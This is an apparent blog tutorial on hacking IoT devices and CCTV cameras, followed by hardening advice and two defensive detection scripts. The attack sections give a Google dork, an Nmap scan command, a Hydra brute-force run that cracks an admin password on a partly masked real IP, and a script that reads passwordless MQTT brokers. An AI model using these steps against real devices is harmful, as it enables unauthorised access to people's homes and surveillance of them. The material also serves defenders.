The 5G era has arrived and all kinds of devices are being connected to the World Wide Web. As a result, more and more online devices are exposed to malicious users. CCTV cameras are the most targeted devices so far, but new hacking trends focus on home IoT devices.
This article reveals how hackers are able to spy on people's everyday lives and remotely operate thermostats, lights and garage doors. It then explains ways to protect against hackers' attacks. Finally, it shares a video showing how 20 IoT devices were hacked.
Hacking IoT devices is totally illegal. Do not try any of the described methods without permission. This article is for educational purposes only. Forknerds is not responsible for any crime. The aim of the article is to raise awareness of IoT and CCTV camera security.
Hackers’ IoT Targets
The most common devices that are targeted by hackers are the following:
- Wireless cameras (CCTV)
- Wireless printers
- Wireless NAS and routers
- Baby monitors
- Smart home assistants
- Smart thermostats
- Smart door locks
- Doorbell cam
- Smart light switches
- Smart smoke alarms
- Fitness devices
- Health devices
What exactly is IoT (Internet of Things)?
According to Wikipedia, the Internet of Things (IoT) is a system of interrelated computing devices, mechanical and digital machines, objects, animals or people that are provided with unique identifiers (UIDs) and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.
In simple terms, IoT is when all devices are connected to the internet. The size is irrelevant: it can be a smartwatch or an expensive supercar.
However, there are a lot of concerns about the dangers of the widespread adoption of IoT.
How to find CCTV cameras and IoT Devices
Detecting devices with Google dorks
Search engines use thousands of spider bots to search, crawl and index the whole internet in a few minutes. During this process, spider bots might encounter and index web servers that belong to IoT devices or CCTV cameras. Specially crafted Google dorks are able to reveal IoT devices.
The easiest way to find IoT Google dorks is the Google Hacking Database, where there is a category called “Various online Devices”. I have collected some of the most interesting Google dorks per device:
- Thermostat: intitle:”Status & Control” + “Thermostat Status”
IoT & CCTV Network Scanners
Almost all IoT devices run services on the TCP/IP stack that can be detected by network scanners.
Nmap is open-source software used to discover and audit network nodes.
Nmap has countless features that help hackers detect open ports, the services being run and the operating system in use. Moreover, it can identify whether a target is hidden behind a firewall.
Each IoT device or CCTV camera runs on a different port and uses a different daemon. It is not an easy task to create an Nmap command that will enumerate all available devices.
My proposed ultra-fast Nmap command to enumerate the vast majority of IoT devices and CCTV cameras is the following:
nmap -T5 --max-parallelism 10 -P0 --max-rtt-timeout 1s --open -sV -p 80,8080,8081,8082,8083,9550
Explanation of the flags:
-T5 : Timing Template (higher is faster)
--min-parallelism/max-parallelism <numprobes>: Probe parallelization
--min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
--open: Only show open (or possibly open) ports
-sV: Probe open ports to determine service/version info
-p <port ranges>: Most common port of IoT devices
The results are really interesting and even by scanning a small subnet, we were able to detect media servers, DSL routers, and webcams.
PORT STATE SERVICE VERSION
80/tcp open http Hikvision DVR web UI
Service Info: Device: media device

PORT STATE SERVICE VERSION
80/tcp open http TP-LINK embedded httpd

PORT STATE SERVICE VERSION
80/tcp open http nginx

PORT STATE SERVICE VERSION
8080/tcp open http Hikvision Network Video Recorder http admin
Service Info: Device: webcam

PORT STATE SERVICE VERSION
80/tcp open http
1 service unrecognized despite returning data.
We manually identified all of the unrecognized services, which led to new webcam login GUIs.
Computers Search Engines
These search engines let the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters. Some have also described them as search engines of service banners, which are metadata that the server sends back to the client.
Shodan is a very powerful tool that should be used with extreme caution. In a single query we can find thousands of camera IPs:
Computer search engines index pretty much everything:
- Water treatment facilities
- Medical Devices
- Traffic lights
- Wind turbines
- Smart TVs
- Media Servers
- Everything with a public IP
All these engines have online APIs which can be used to automate and speed up the enumeration. They support filters that target specific ports, operating systems, protocols or banner strings.
In general, IoT exploitation can be divided into two big categories: remote and physical. In this article, we will present remote exploitation methods. If you are interested in local exploitation, I suggest checking the video at the end of the article.
Zero Exploitation Effort
Countless IoT devices and web cameras are misconfigured and, as a result, credentials are not required to access their control panel. As soon as you find the IoT device's IP, you are already in.
Hacking finds even unprotected Puppycams!
Brute Force administrator panel
Many discovered IoT devices have a password-protected administration panel, like the following thermostat:
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible. It is considered a “classic” hacking tool, as it has existed for over a decade. It can easily crack an IoT device via brute force, as shown below:
root@kali ~# hydra -t 10 -I -C passwords.txt 73.110.xx.xx -s 84 http-get "/index.shtml"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-10-30 19:53:32
[DATA] max 10 tasks per 1 server, overall 10 tasks, 49 login tries, ~5 tries per task
[DATA] attacking http-get://73.110.xx.xx:84//index.shtml
[http-get] host: 73.110.xx.xx login: admin password: xxxx
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-10-30 19:54:21
-t TASKS run TASKS number of connects in parallel per target
-C FILE colon-separated “login:pass” format, instead of -L/-P options
-I ignore an existing restore file (don’t wait 10 seconds)
http-get attack method for basic HTTP authentication
-s PORT if the service is on a different default port, define it here
Always use Complex Passwords!
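Repeated HTTP basic-auth guessing like the Hydra run above leaves a burst of 401 responses in the web server's access log. The following detector is an added example, not code from the original article; it assumes the device or a reverse proxy in front of it writes Common Log Format lines, and the sample log, IP addresses and thresholds are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common Log Format: ip ident user [time] "request" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3}) \S+')

def parse_line(line):
    """Return (ip, timestamp, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, int(m["status"])

def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Flag IPs with >= threshold 401 responses inside a sliding window.
    Returns {ip: {"failures": n, "succeeded": bool}}. "succeeded" is set when
    a 200 follows the burst, meaning a password was probably guessed.
    """
    recent = defaultdict(deque)  # ip -> timestamps of 401s still in window
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, status = parsed
        if status == 401:
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:  # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                alert = alerts.setdefault(ip, {"failures": 0, "succeeded": False})
                alert["failures"] = max(alert["failures"], len(q))
        elif status == 200 and ip in alerts:
            alerts[ip]["succeeded"] = True
    return alerts

def sample_log():
    """Constructed data: one mistyped password, then a 48-try burst."""
    req = '"GET /index.shtml HTTP/1.1"'
    lines = [f'192.0.2.20 - - [30/Oct/2019:19:40:00 +0000] {req} 401 0',
             f'192.0.2.20 - bob [30/Oct/2019:19:40:09 +0000] {req} 200 512']
    lines += [f'198.51.100.7 - - [30/Oct/2019:19:53:{s:02d} +0000] {req} 401 0'
              for s in range(10, 58)]
    lines.append(f'198.51.100.7 - admin [30/Oct/2019:19:54:01 +0000] {req} 200 512')
    return lines
```

Calling `detect_bruteforce(sample_log())` flags only the bursting address and marks it as having succeeded, which is the case that calls for an immediate password change on the device.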
Hacking IoT with MQTT
According to Wikipedia, MQTT is an open OASIS and ISO standard lightweight, publish-subscribe network protocol that transports messages between devices. It is designed for connections with remote locations where a “small code footprint” is required or the network bandwidth is limited.
The MQTT architecture consists of clients and brokers. The broker is the node that receives all the messages from the clients and then routes the messages to the subscribed clients. The nodes that send information to the connected brokers are called publishers; the broker is responsible for forwarding the data to the subscribed clients.
As already mentioned, it is easy to locate MQTT brokers in the wild via network scanners like Nmap:
$ nmap -T5 --max-parallelism 10 -P0 --max-rtt-timeout 1s --open -sV -p 1883 <ip>
As soon as you locate a passwordless broker, you can connect and subscribe to all topics by using an MQTT client. A client can even be created with a Python script using the paho-mqtt library.
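# Written against the paho-mqtt 1.x callback API
import paho.mqtt.client as mqtt

def on_connect(client, userdata, flags, rc):
    # Called when the broker answers the connection request
    print("Connected with result code " + str(rc))
    # Subscribe to the broker's $SYS status topics
    client.subscribe("$SYS/#")

def on_message(client, userdata, msg):
    # Print every message received on a subscribed topic
    print(msg.topic + " " + str(msg.payload))

client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect("<Broker IP>", 1883, 60)
client.loop_forever()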
In my case, I will use my favorite MQTT client called MQTT Explorer to connect to one of the discovered brokers. My client will automatically subscribe to all available topics. MQTT topics are a form of addressing that allows MQTT clients to share information and they have a hierarchy as shown below.
The leaves of each topic consist of data produced by the sensors and devices, such as humidity, motion, battery, etc. It is clear that a passwordless broker is a serious security breach, but it can get even worse. The MQTT protocol supports message payloads that update the status of a remote device. For example, we are able to switch on the garage lights remotely by publishing a relevant request. The options are countless.
Hackers can easily control all IoT devices via an unprotected MQTT broker.
Video: How to hack 20 devices in 45 minutes
How to protect your IoT devices
There is no silver bullet when it comes to IoT protection. The following list summarizes the most important ways to protect your IoT devices.
- Always buy IoT brands that focus on security and regularly release updates
- Keep your IoT device firmware and software up to date
- Enable authentication on all administrator panels
- Enable encryption for MQTT connections
- Enable two-factor authentication if it is supported by your device
- Always use long and complex passwords
- Do not use the default ports of the application
- Do not use default usernames and passwords
- Disable features that you do not need
- Do not publish internal servers on the internet
- Use a VPN to hide your servers
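To confirm that enabling authentication has actually taken effect on a broker you run, you can send an MQTT 3.1.1 CONNECT without credentials and read the CONNACK return code. The following check is an added example, not code from the original article; the function names and the client id are illustrative.

```python
import socket
import struct

# CONNACK return codes defined by MQTT 3.1.1
CONNACK = {0: "accepted", 1: "unacceptable protocol version",
           2: "identifier rejected", 3: "server unavailable",
           4: "bad user name or password", 5: "not authorized"}

def mqtt_string(s):
    """MQTT string: 2-byte big-endian length followed by UTF-8 bytes."""
    raw = s.encode("utf-8")
    return struct.pack("!H", len(raw)) + raw

def remaining_length(n):
    """Variable-length integer used in the MQTT fixed header."""
    out = bytearray()
    while True:
        n, digit = divmod(n, 128)
        out.append(digit | (0x80 if n else 0))  # high bit: more bytes follow
        if not n:
            return bytes(out)

def build_connect(client_id, keepalive=30):
    """MQTT 3.1.1 CONNECT carrying no user name and no password."""
    flags = 0x02  # clean session only; user name/password flags left unset
    body = mqtt_string("MQTT") + bytes([4, flags]) + struct.pack("!H", keepalive)
    body += mqtt_string(client_id)
    return b"\x10" + remaining_length(len(body)) + body

def parse_connack(data):
    """Return the return-code text of a 4-byte CONNACK, or raise ValueError."""
    if len(data) != 4 or data[0] != 0x20 or data[1] != 0x02:
        raise ValueError("not a CONNACK packet")
    return CONNACK.get(data[3], f"unknown code {data[3]}")

def broker_accepts_anonymous(host, port=1883, timeout=5.0):
    """True means the broker let an unauthenticated client in (a finding)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connect("auth-audit"))
        accepted = parse_connack(sock.recv(4)) == "accepted"
        if accepted:
            sock.sendall(b"\xe0\x00")  # DISCONNECT before closing
    return accepted
```

A hardened broker answers with "not authorized" or "bad user name or password", or closes the connection, in which case `parse_connack` raises `ValueError`.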
Security is a big challenge for IoT devices and CCTV cameras. Cyber attacks will increase and they may focus on smaller devices. Personal freedom is at risk, as attackers can reach you inside your house. Security professionals must understand the challenges of new technology. As time passes and new technologies emerge, new attack vectors will be found and exploited by hackers.